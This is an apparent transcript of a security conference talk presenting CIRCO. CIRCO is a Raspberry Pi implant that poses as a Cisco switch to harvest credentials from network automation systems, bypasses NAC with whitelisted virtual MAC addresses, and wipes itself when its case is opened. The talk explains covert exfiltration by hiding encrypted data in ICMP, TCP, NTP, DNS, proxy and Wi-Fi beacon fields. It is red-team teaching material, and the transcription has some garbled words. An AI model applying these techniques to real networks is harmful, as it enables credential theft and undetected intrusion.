 So, soon to be a good afternoon to everyone, and now it is my absolute pleasure to introduce you to Emilio. Thank you. Thank you. Let's see. Can you hear me? Good. All right. I think good morning, good afternoon, good evening, depending on which time some of you are. Let me start with today, I'm going to present a tool called CIRCO, so let me first do some introductions. Hello, that's me. So I come from Japan. I know that I don't look very Japanese yet, but I've been living there for ten years. So you can call me either way, it works both ways, Emilio, Emilio, or something like that. I like to play with networks, packets, and a bit of 3D printing as well. So I did demo a few tools already in a couple of conferences, some of them are in Japan, so you may be aware or not, and just keep in mind, I'm not a programmer. So the code works, it's nice, and there's a lot of improvement to do, but it runs. As long as it runs, it's quite good to go. All right, for those who are not familiar with what is actually the tool itself, the idea born actually from the automations. We have, within the enterprise networks, we have a lot of automations tools, and those tools actually are just discovering every new device that connected to the network, and actually connected and provisioning and do a lot of really cool stuff. Sure. But what about if it's not the Cisco switch what you are connecting to? That basically giving us the credentials for free. Great. That was a good idea, I thought. So what it came out actually was a way to make something camouflage, which is not going to be noticed, and put it in there when you do red teaming, within the meeting rooms, open space, secretary, those kind of places. So I look into finding a way to do this. So in this release 1.5, what is new is actually, before releases, I was not able to have an IP phone working, so I will go and plug the IP phone and use that cable, but that's it. The IP phone will be off. That's something that people will notice because either it's not working anymore, and I wasn't very comfortable. So few people pointed out as well, so this version I managed to remove the phone but plug the phone back to the box itself, and it keep working as it's nothing. So we're going to dig into that. I did some coding updates, and also some exfiltration techniques, and encryption for Pro-N-Forensic, cell destroy switches, integration with Faragai, and bypass NAC, basically. Lot of features, basically, between 1.4 to 1.5. So who do we target? Well, pretty much any automation system out there. These are quite a few known systems, HPNA is very popular, of course, NETMRI as well. NAC itself is not an automation system for network provisioning, but what it does is try to prevent things that I'm trying to do, basically. So I will get rid of NAC as well. And of course, there's always some admin connecting to things, and put password everywhere. This is an example of things that happen with Raspberry Pi. Some device in the network that nobody noticed, it's been exfiltrating data in the NSA, and this is not uncommon, because NAC is very hard to solve all our problems. So it did happen. Okay, so what are my main issues for version 1.5? Power options. I'm going to put a Raspberry Pi, which I need power, okay, battery, PoE. I perform when I plug it, that looks suspicious. Someone told me, but if you find the list of enclosures and you open, you can do, you can see the keys where the box is exfiltrating data, I said, because it's just an SD card and a Linux. Yes, so I need to add some forensics, prevent forensics on it, encryption basically, which is a key, always a problem. All right, so let's start with the first problem that is the power. So I came out with the paper idea, the easiest one, you just start to draw in things and come up with a list of wishes that you want to do. So this concept was okay, the PoE negotiation is very complicated, and it has many standards and there's many different ways to do it, many implementations are different, but there's one thing, one element, that the phone and the switch, they will do the negotiation of the power, how much power you need, how many watts, et cetera, et cetera. So I didn't want to get into that. So I say, okay, let the phone negotiate, once that's done, I just hook the power. So it came up with the idea that violates every principle in networking, pretty much. Okay, why not, let's give it a try. So once you have a paper idea, what you tend to do is break boarding, let's do, let's go, come on, plug some cables and see what happened, something will blow up for sure. So you start to build up some ports and, yeah, this break all network industry standards, by the way, so trust me on that one. So what tends to happen when you start to do this is at some point, without you noticing, this actually works. And I'm like, okay, this is actually a good thing. So now you actually elaborate on it, so you move into prototyping. So this is a little board for just, because they keep coming out, the jumpers from the breadboard, so they say, okay, let's make it a bit more stable. So I did a prototype to see, basically, it's 4RJ45 and a DC to DC converter plus a USB socket. So it was a very simple idea. It's all the wiring that goes underneath. So again, I never designed a PCB, so it would be nice to have it like a Raspberry Hat, maybe, or go into that. So I'm still trying to figure out, so prototyping is okay. All right, how Circo evolved between different releases. So Circo has around one year old, maybe, around October 2018. So it started like an idea in a box. When I mean in a box, I mean literally in a cardboard box. It was good because you can see the components, and you can see, ah, this is the, ah, you can even put labels on it, so it was quite, yeah, it was fun. So what happened here is that I used to use a PoE LAN modules, and I bought one that DC, so basically what it does is it does the PoE negotiation and then give you the LAN back and the power. So I bought one, 12 volts, okay, I need to convert this to 5 volts, and then I figure out they sell the 5 volts. So this is the first release, right? So then we evolved into a production. So they say, okay, let's move on, so I got some enclosures, they look like these boxes that you have under your desk, over your desk. So the whole concept is, okay, let's work with what we have in the market. So I look for these closures to put stuff in it. So in this release, I only have, you see there's only one cable going on? That's because I unpacked the phone and that's it. And also the smaller version, that was a bit more tricky because there's less space, that you can use as Raspberry Pi Zero, which is a bit cool, but you really need to work with the space. Again, this version has only one LAN, so you need to work with the LAN adapters on the Raspberry Pi. All right, so we move to this version, this version has actually this box. This box, because I remember, now I'm still in the phone and I'm going to plug back the phone here. So what I'm going to do is use two different LAN adapters on the Raspberry Pi. So that's the reason I have a USB LAN adapter plus the onboard. As well as on the bottom, you will see a DC-DC converter, the 48 volts of PoE, back to five volts to power the Raspberry Pi. And on the yellow thing that you may see there, there's actually a magnet switch. You see where I print, 3D print some handles to mount it, but it's basically a magnet and a tilt, a magnet switch. So what it does, that is the key, when you open the case, it will detect that you open it and you can RMRF, you can do whatever you want, reboot, shut down. So this is to prevent forensics in case some forensic go and don't unplug the cables and just open the suspicious case that they found, it will blow up basically if you want to. That was a bit dangerous to do, EPMs, heat ups, fire hazards, so just be careful. Of course, the same thing into the smaller box as well, is that here what I need to do is choose USB LAN adapters and a hub. So it gets tricky, but it still fits. So depending on what you find in the market, as a discussed box, you can play around. So how much does this cost? Because this must be a really expensive thing. Well, this is an example of how this box costs, right? So to give you an idea, this is a Raspberry Pi Zero, the two USB LAN adapters, the micro USB hub are ridiculous small and just the outlet, which is one of the things most expensive. The outlet I think is $10 or something. So yeah, you can get this for $50. So if you don't want to go to pick it up, so you do a pen testing, you leave it there, you are welcome to go and pick it up, or no, depends how well things finish on the pen testing report, right? So, you know, just in case you want to lose it. All right, so the hard one is one thing, it's very simple components, it's a LAN adapters, Raspberry Pi, plastic box, and some DC-DTC bucket. So now the question is what we are using as a software. Well, Circo is actually the little box, but we also have a few components. We have a component called CARPA, which is actually a software component only, running on the internet, in a VPS, Python, and Linux, so that's very simple components. So that's software only. Why? Because once this box is infiltrating to the network, what is it going to do? Well, it's going to become a Cisco switch to get this cover. So all these are lovely automation systems will connect to me and give me the credentials. So essentially it's a honeypot, basically. But what happened once I have the credentials? SNMP, Tennis, SSH, whatever the user sent to me. Great, now I need to exfiltrate to the internet. And this is a tricky part, because I need something on the internet to receive it. And that was CARPA coming to play. At the moment I have a demo here, which I run it on the Raspberry Pi Linux. You can run it on any VPS in internet, Amazon, or any VPS server will do. The only requirement is that you have a domain name assigned to NS records assigned to this public IP of your VPS, or NATTED, if you have NATTED. So and then we have one more component, which is Haula. Haula is, again, software component. You can run it on the Raspberry Pi with a power bank and a wireless adapter. What it does is basically you can also exfiltrate via wireless. So it will do from the box itself to the internet, or via wireless, or both if you want to. So wireless, of course, you need to be a proximity. Keep in mind here, we are not setting up any access point. This is not an access point, because that will be catched by a WIPS, right, whips. So we don't want any whips to notice us. So currently it's in Python 2, coming into tree soon, and it's all packet manipulation are mainly based in SCAPI, in Python. And we are using some other tools from a different combination of people as well. For example, for the OS Fuller, some part of the code of the OS Fuller to full NAT, effectively speaking. And what actually exfiltration we can use. We have PIN, trace route, NTP, HTTP, HTTPS, DNS, proxy, and wireless. Of which all of these are atomic. Basically nothing come back ever. So from a far point of view, it's a timeout session H out. So there's never a session in none of those protocols that I just mentioned, or established connection or anything back. So basically the Karpak never sent anything back to me. And another new feature that came out is just because I have a phone, right, and the phones keep working, I'm basically manning the middle between the phone and the network. However, most of the offices people connect the phone and the PC to the phone. So that automatically gave me free traffic from the PC as well. So that was a free bug, kind of. So effectively speaking, you can run different tools to capture, tell net SSH, FTPs or unencrypted protocols or hashes exfiltrated as well. So not just the network part, but also the PC if any connected to it. So how I become a Cisco switch? Well, I need to be able to send a CDP, LLDPs. I need to be able to have an SNMP server, agent basically running, and tell net SSH, and all my package need to look like a Cisco switch. So that was the 3H basically of how we come out. So for flows, I have a single mode that used to be when you don't connect the phone back and the bridge mode, which is the most interesting for this talk. So in bridge mode, this is how it will work the logic, right? So once you turn this box turn on, what it does is it does the discovery first to see what is the switch and it's close to me, the real switch, and you try to get the name. Once you get the name, he will try to get one similar to itself. So if this switch, for example, is switch Tokyo 01, he will become 03, or he will change the last digit by 2. The logic is very simple. If no, they always fall back to test 01. We need to pretend to be a nice new brand Cisco switch in the network. So we want to get that information first, then we get an IP address, and we start to set it up. Of course the MAC address, it is of the Cisco switch. We changed MAC address at the beginning. As well, one thing we want to do is start to advertise CDP and LDP to the switch. That's the way we get discovered by the automations tool. What tends to happen is the existing production switch is already hooked to the automations tool, and when he sees CDP and LDP new neighborhoods, he will discover that on the system. On the system, once a day, we connect and try to pull the config, et cetera, et cetera. Basically give us the credentials. So once this happens, once we get the credentials, we can set it up to how often we want to exfiltrate it. So I and I will cycle if we want to just do it once or do it every one hour. The same exfiltration and which method you want, all of them. So to do this demo, I actually need to build a network with a proper switch and a firewall and a router and a DACP and the internet. So I used to have all this spread in the desk. I was very difficult to set it up. We always forget one cable and things don't work. So because in Japan, we have a Toyota that makes cars, right? So it came out with Macaroni. This is our infrastructure in a box, basically, in a briefcase, and it only costs $200. It doesn't cost $20,000 like Toyota. But what it does is simplify things very much. And so the lab itself, I know everything has an acronym, right? Much perfectly. So the lab itself looks like this. It's basically a proper, you can look it up after if you want to. It's a proper Cisco switch and the car pie is simulated with a Raspberry Pi. I also hook a snort in the outside on the internet to see what the snort will see. This snort is configured as it comes. In the middle there's no actually any tuning. So it's default, basically, all. So it's supposed to catch even rubbish traffic as well. So what I'm going to do is explain how the exfiltration technique works. So for exfiltration, what I'm doing, I need to be able to tell my device in the internet which discredentials who took it from. So it came from my TenNet Demon, my SSH Demon, through SNMP, or even the PC that was hooked as optional work I'm working. Also, I want to know that this is an able password of the switch, or is the user an password of the switch? And is SNMP the community of, basically? This is where we SNP 1, 2, V2 as well. Three not yet. Nobody is actually in any network that I'm aware. So this is the format and the source IP of the automation tool or the laptop administrator, whoever connects to my box. Right, guys, this is specifically the format that we want to exfiltrate. So the way, one way to exfiltrate this data is, first of all, we will encrypt it with AIS 256. So let me first go into show time. Let's start with the demo. Let me see if you can see, let me close this. So yeah. I cannot see, though. I cannot see what I'm typing. Let me bring back, kind of mirror. I don't know how to do this. Look better now? Look okay? Yeah? Right. So this is my server in the internet. So when I run it, I just, this give me the options of the server. So this is my snort, this is my administrator PC, and what I need now is my box. I also have this is a, because this version integrate with Farai. So let me log in. So Farai just, I have one workspace and I have host, I only have one host with some vulnerabilities. All right. So let me do the magic. I need to put a magnet because I opened the lid. So I need to, you know, hack the lid open type of thing. So what you do is you take the phone out. This is my LAN from the switch, an extra cable from the phone. And there's a lot of flashing lights here. That is just another Raspberry Pi. Nothing more interesting than that. So one thing that I did find out was how to prevent encryption. So I'm going to use looks to encrypt the partition where I'm going to have the software here in case someone found it. Probably with encryption is to decrypt you need to encrypt and decrypt you need a key. So what happened with it when you want to do that in a box that is very close, you go there and put it. You don't have a laptop and installation system to spend, or put a keyboard to Raspberry or whatever. So what I came out with is I need a long key that I can use quickly to encrypt, mount and encrypt this Raspberry Pi. So I found that this Raspberry Pi has Bluetooth. Great. So I create the, there's a million of applications. There's a Bluetooth application that you can create the services. You can do it from a Linux as well. So what I'm doing is I create a service called Circo and it has the UID, UID which is 128 bits. So guess what? That's my key. So what this guy is doing, once he boot up, at the moment it's in demo mode. So in the mean like I should be able to access. So if I do the F, the home drive I want to do is called P and keep. So if I do, there's nothing because it's not mounted, right? So what I'm going to do is turn on this Bluetooth services. It's a demo key. It's in case you have a sniffing Bluetooth. It's not for production use, right? So once I turn on, you run every five seconds I think I put it, or ten seconds. What it does basically is scanning to see if it found the services and use that key to mount and encrypt looks. So ideally this is all automatically actually. Let me see. I think it's ten seconds every. Ten seconds. Ten seconds. I can't remember what I put it. So I create the services. Use the system looks. Yeah, I created a little script basically to do that. Let me see. This is on. Or maybe I have Bluetooth off. I will explain. There you go. Now it's jamming Bluetooth, right? This is what happened with live demos. Come on. It did work before. Yes. Let me stop start. And let me do start. I think it's my phone actually. All right. Let's see. Let me do this manually. Oh, it did work. Oh, it was already mounted. Yeah. Well, playing with Bluetooth within Defcon sometimes no good idea. So let me turn off this back off. All right. It's already mounted. So let me go to... This normally will still start automatically. But... So... Oops. So I just to give you the menu. So I got Carpa, which is the one in the Internet, to receive the credentials, which I'm going to start in the voice mode. And the plugin is a Faraday plugin. And the interface is zero. And just a file where you want to put the output, the credentials you find. And so this is the Zirco interface. So what do you do? First of all, we go into bridge mode. Well, I put their voice. We go into bridge mode because it's the one using the phone and the LAN at the same time. You still have backward compatibility because that's a good way to do things. And then we can choose what the exfiltration technique we wanted. You can actually see the all or let's... Can you ping, DNS, HTTP web, NTP, proxy. I don't know. I couldn't put to minus A actually. So when you start it, let me see. This one already start and log into Faraday. Okay. The plugin to Faraday, what it does basically is every credential that he gets, he will inject it into Faraday directly. So when the Zirco studies in verbose mode, that's the reason you see all the steps of what it's doing. So it starts becoming a Cisco Macadre switch. This is to bypass NAC. Due to the Macadre I'm using, it's a golden one. So if you read through NAC, it works out NAC manual. It's a very small syntax. If you use this Macadre, you'll always allow it. Just read the document. It should be fine, right? Guess what? That's what I'm using. Great. Thank you for the manual. So becoming... Can you read, right? Yes? Do you know why we can make it bigger? That's too big? Better? Yeah? So what it does is we... It becomes Macadre switch, discover, start the ACP. It's configured interface. So this is all the configuration proxies. The proxy, I have three different techniques for the proxy. We'll go into details. This one is using the ACP. And then from here onwards, it becomes started a Hanipot. Right? The last line you see is because the magnet I put there. The lid is open, but I put the magnet manually. So if I take that magnet out, things will go crazy. So now, I'm going to go to the real switch. This is my real switch. Right? This is Tokyo Zero One. This is my real switch. If I do show CDP neighbors, guess what? I see a phone. And I also see a switch called Zero Three. It's a 2960. You can choose details. And this is... Yeah? It has an IP address. This is a version. The port. The Cisco switch. So I can see show CDP and show LDP. As well, I can see LDP. So this switch, believe, is someone connected a new switch, maybe in a meeting room for training or something. So it does have an IP address, which is 151. All right? So this is my admin PC. What happens if I turn that IP address? I get the same prompt. Okay? So I tap my super user and switch number three. So now what I believe is a switch. I can run commands. Cisco commands. Show version. Yeah? It's a 2960. This is the version running. Show IP routes. Show IP ARP. Show MAC address. Show interface description. It is a Cisco switch, what I believe in. Show CDP neighbors. I need to type it correctly. Of course, it's a Cisco switch. Yeah, I can see now Cisco switch one, the production one. So they see each other in theory. Same with the show LDP neighbors. Yeah? I can see. So from this switch. So when automation systems connect to this switch, by telling the SSH, with the master credentials, they will run a set of commands to get the configuration inventory, et cetera, et cetera. So those are most of the commands that support. Did not code the whole iOS simulator just for fun? It wasn't fun. Yeah? The question mark. Also work, by the way. Yeah? Oh, and if you want to go to show run, of course, you need to be enable mode. Okay? Go enable. Yes, sure. Great. Secret. Now I can do show run. Yeah, that works. What I can do is conf T. No, that doesn't work. I said the common stack X errors, because I'm not going to prepare an iOS, basically, right? So this was a time that I did, right? So you can see in the configuration that the community is public. There's an MP community. Now, what tend to happen is, automation system will first try their own as an MP community. And if fail, it will try the public, you know, one of the least of the common ones. So let's say I will try the system community, the one that they use in the company, right? So when I try that, that will not work. A, because it's public, the one that works. But you did already give in the community with that command. So when you do public, it has to reply like a Cisco switch. It is actually the name, the app time, the version. It is a full SNMP device that you can pull. Now, what happened when I went back to Carpa? Well, I started to receive this data. This is because it's verbose. So basically, tell me that something via PIN, from this public IP, still net, user net admin, password, very smart, from this source IP, they connect, which is internal IP of this administrator laptop automation system. And then I get the same password via PIN, DNS, trace route, DNS is proxy, by the way. HTTP, NTP. And then I also get this via here. So, whoops. Someone connect, tell net, enable, the E just standby enable with this super secret password. So again, if I now do the same thing, let me open the... So this is what this L IPS is looking for, ignore the unreachable because I don't have internet connection, of course. But the only traffic that these guys can see, because I enable the default, is a PIN. So Cisco switch is sending a packet PIN. Nothing come back, but that's the only alarm, which I don't know anyone that has SNORT with ICPIN configured for alarms. That would require a lot of alarms. That's the only thing you can see on the SNORT side. So again, when you see a PIN, and the community, my switch did not reply to the community, but you did give it to me. It didn't reply to public, but not to the community you give me, but I exfiltrated. So now if I go to Faraday, right? So when I do a host, when I do refresh, now I have a new extra host. This 10.10.10.88 is the source IP of the automation tool or administrator. Then the where is connecting. So what happens if I go to the credentials, I can see the target, I can see the protocol that comes to the telnet, the enable, and the password. This is the telnet, the username, and the password. And this is SNMP. I should put SNMP instead of P. So now, as soon as I get them in Karpah, via an API, I can inject it in Faraday in real time. So that's for helping the pentesting report side. So now what happens if I actually remove the magnet? You know? So you start to see this alarm open, alarm open. That means that because I did not unplug it, right? I remove the magnet. So what it does is when you detect that someone opened the case, the magnet get opened, it will send a magic packet via exfiltration saying that someone opened it. So, you know, maybe there is time to make the report. So, of course, you can make it, if you go here, for example, this was the circle running in debug mode, right? So you see that it's sending the credentials. And here is when I took the magnet off, right? You can do this, for example. That command, what it does is it immediately reboot. So what it does is remember because we have the Bluetooth encryption. So unless I'm back close to this box with this thing enabled, that will not work if it reboots. So if someone unplugged and replugged, it will not mount encryption. So that is a balance between having encryption and functionality. So if you want encryption, you want the Bluetooth, sure. But if someone by mistake unplugged and replugged, it will not work again. You need to be back walking around with the mobile in your pocket, right? So, yeah, you can do whatever you want. You can, you know, eat BGM pools, I don't know, burn fires, whatever you like there. So this is the way that this stuff works. So these are the components. So let me go into deep into the exfiltration. Something's in the middle, right? Excuse me. There you go. Go away. All right. So how I do... So this is basically a nice honeypot. How do I take the data out? That is the interesting point. So this is going back to basics. So we are using protocols that are through for hours. Some of them are blocking the companies. Some of them can go through. So for example, some companies do allow PIN to go for travel shooting or trace route. So these are the protocols I'm using. ICNP, I'm using specific TCP and IP and UDP packets fields to actually put my data. Remember, I have one line, say T dash, the comma, username, comma, password, comma and IP address. That what I do is encrypt it, AES 256, and now chunk it in two bytes or six bytes. So the way to work encryption, basically to decrypt it, you need to tell me how many packets I should expect, how long should my crypto be? So I'm going to send you 13 bytes of crypto in seven packets, two bytes each. So first of all, I need to be able to tell that in advance before sending the packets. So what I'm doing is I'm sending one packet. These are the IP header. There's a field called identification in IP packets. That do not get changed by NAT. When you NAT through a firewall, that doesn't get changed. So okay, it's two bytes that I can use for something. ICNP packets. Within the ICNP packet, you also have identification and sequence numbers. Again, two and two bytes that I can use for something. So ICNP, how it works. Basically, I need to tell you my 13 bytes and seven packets. So I would send one packet saying that 213 is the IP ID, right? And the rest is just randoms. So that means that the receiver know that he's expecting 13 bytes, right? Then I'm going to send you 307 as an IP ID. 300 means that actually you're expecting seven packets, right? And then I will send you seven packets, right? With the 501, 502 as a sequence ID. That is the sequence of the packet in case they get a different order. All right, right? And the crypto, within the ICNP sequence, which is two bytes, I will get that becoming an integer and that will be my crypto. So I need seven packets to do 13 bytes. Plus padding, right? One byte of padding. So this is a way that most of the filtration technique works. It's basically chunking data into specific fields within different protocols. Like ping, for example, or trace route. Trace route, we are using the data payload. Physico switch, the last four bytes are rubbish. So we are using those four bytes with X. My encrypted data become X. I encoded into X, which looked like an X as a string. So that's a good place to put four bytes. Again, similar concept. First, I need to tell you I'm sending 30 bytes and seven packets and then I send you one by one. Now, if we move into HTTP or HTTPS, remember, I'm not making a session. I'm just merely sending the sync packet. That's it. So there's something called window size in TCP and do not change between the client and the server through NAT. So you have NAT and that thing doesn't change. Great, great. So I have one, two bytes that I can use that does not change between an internal client and an internet server. So that's what I'm using. Similar concept, I'm using the sender 213, like we saw in ICMP, but I'm putting the crypto within the window size of the TCP packet. So yeah, for 80, 443 or any port you like, 25 if you want to. But remember, most of the stuff probably don't have direct access to the internet. So those exfiltration may not work. HTTP, HTTPS, actually any TCP port will be the same concept on this. You just send the sync, nothing come back and in the crypto goes into the window size. Of course, I become an integer, right? It's just supposed to be a number. And the whole process is in reverse in the other side. In the carpa, it's the other side receiving, it's the whole thing the other way around. So NTP, NTP was a bit fun. There's something called transmission timestamp, great. So the transmission timestamp has this format. So it's basically a timestamp plus a fraction. And the timestamp is 32 bits and the fraction is 32 bits. Wait a minute, that's a lot of data I can put in the 32 bits, I say. So I'm using the fraction. So basically the way that works is I'm playing with the stratum and Paul to tell them, again, my crypto is 13 bytes and it will send 7 packets or 6 packets or whatever is the padding that I need to do. In this case, I can send 4 bytes. So in reality, I don't need 7 packets because it's 13 bytes. So maybe 4 packets will do. So I need to delineate 4 packets for this protocol specifically. And then I put it in the fraction, convert it into an integer or actually it's a float because it's 32 bits. And then the process is the other way. So inside NTP query, I'm putting the fraction timestamp of the transmission timestamp, 32 bits of it. DNS packet, this one is easy. It just uses subdomain. Encrypted.mydomain.com. But I'm not sending a query to the internet. I'm sending an NS query to the actually internal DNS on the company. So this attack is not direct. So I don't have access to go outside. But the DNS server has internet resolution through a relay or direct maybe. So what tends to happen when you do an NS query, what it does, you will do recursive until you get it. Assuming your DNS actually has internet resolution. Again, this is a hash encrypted. It's 30 bytes we talk. So it's not very long chart. You send it one query. Here you don't need multiple. So in this case it's the flow of the thing. You will send just to the internal DNS server and the DNS server will go just directly to the... The trick here is that NS server should be Kharpa, the IP address, the public IP, of course, of that evil domain that you're using. Now, what happened when the company do not have DNS resolution as well? You know, no access to internet in any protocol, no DNS resolution, external DNS resolution. All right, proxy. They might have something. So proxy works in a way how you discover proxy through how you set up in PCs proxy. So, what I do for the ACP option 252? WAP or GPOS? Those are the three most common. Okay, so what I do for the ACP, I will do a ACP inform to the ACP server to see if that option 252 is there and get the pack file. What you get is actually a pack file server, right? Get the pack file, parse it to get the proxy IP and port, then connect to the proxy, right? And of course, all proxies are most likely authenticated. Doesn't matter. This doesn't need authenticated to a proxy to work. So, this is a bit tricky because this unfortunately works with all blue codes, macafis, all the like high end proxies. Because they forgot about something. When I do a tenant, a simple tenant to a proxy and I do a get HTTP, my crypto put dot my domain. And of course, I do enter and I get a 403, right? From the proxy. However, the proxy will generate the log in the system saying this IP address, try to go to this URL and he got a 403. But a proxy does one more thing. He does an square of that URL to put in the log, the IP, which does not appear. But what that means is he, which has DNS resolution, now he's querying my DNS server with a string that I want to send. So he's... Okay, thank you. That will do. So, yes, it does generate one entry of 403 in a proxy logs. You know how many of those you get in a proxy constantly? Millions. So, yeah, great. That works if we have the ACP option 252. Okay, sometimes you have WAP if you still have WAP. Similar concept, I just will look for the WAP DNS entry, connect to the pack file, get the proxy and do all over again. But again, no ACP, no WAP, so most likely GPO. So the last thing I can do is DNS guessing. Basically, you give an arrive of names like keywords, internet or gateway or GW or PRX or proxy or gateway, something. So you do that list of 10, 15 words and I will generate a dictionary with a dash, with an underscore, back one and forwards. A matrix, and I will generate a list of 12, we'll say maybe 280. And then I will try with a DNS internal which one actually replied back to me. Then I will test if this is a proxy pack file server. So I will try to connect and try to get a pack file. Could be something else. If it doesn't work, I will keep trying until I see something. So this is the way to go around the GPO because in GPO you need to have access to a window to actually see it. It's per profile, basically. So you can't really sniff it out of the network. And the last thing is the wireless. For wireless infiltration, remember I said I'm not setting up a wireless access point. I'm using beacons. Very short beacons of 500 milliseconds. So what I'm doing is, within the beacons, I'm using the SSID names of the wireless at home in many places. Normally it tends to happen like an X address. The last six digits of the MAC address of that home router is on the name of the wireless SSID. So I'm taking the opportunity to mirror that and broadcasting the instant MAC address part of my crypto. So again, I have a 13 byte. I will chop it in three. I will have six, six and one. We'll get padding. And then broadcast for 500 milliseconds. That SSID of each of the three. And the receiver will be looking for who is, it's like a phone broadcasting SSIDs for a very short time of period. So that's a reason whips will not see it. Basically I'm using beacons as a back channel to push data out for credentials. And that's it. And now I have questions. Oh no. Can you defeat Maxek? The thing is when you connect the switch, right? What you have is actually a phone connected to the switch. So most MAC systems, so if you like, you want to have a network with one MAC address allowed only. Well, most of the company has a phone. The phone tends to have a PC after. So you need at least two. Minimum, right? So because you are putting a a Cisco switch and the MAC address that the MAC address I'm using is actually a golden MAC. MAC cannot block that one. Because the trick is very simple. There's a MAC address for virtual like HSRP or VRRP services. Cisco HSRP is a routine standpoint, right? So what it does is they have virtual MAC address that they create. Those virtual MAC address are widely listed by default in all MACs. Based on the documentation. I did not write it. So are you using one of those? Any other question? Yeah? This one? Oh, sorry. Yeah, I will release the version after DEF CON. No time over DEF CON. It's procrastination. But I will push it out to give have the newest version and the guide for the building. Building is quite straightforward too. It doesn't require three electronics to do that. It's just a Raspberry Pi and a few things. And the presentation, I believe the slides will be up soon. We'll put it in the website as well. There's a website somewhere. There's stickers on the back. If someone wants stickers. If not, let me know. I still have some stickers. If no more questions. Thank you very much for listening.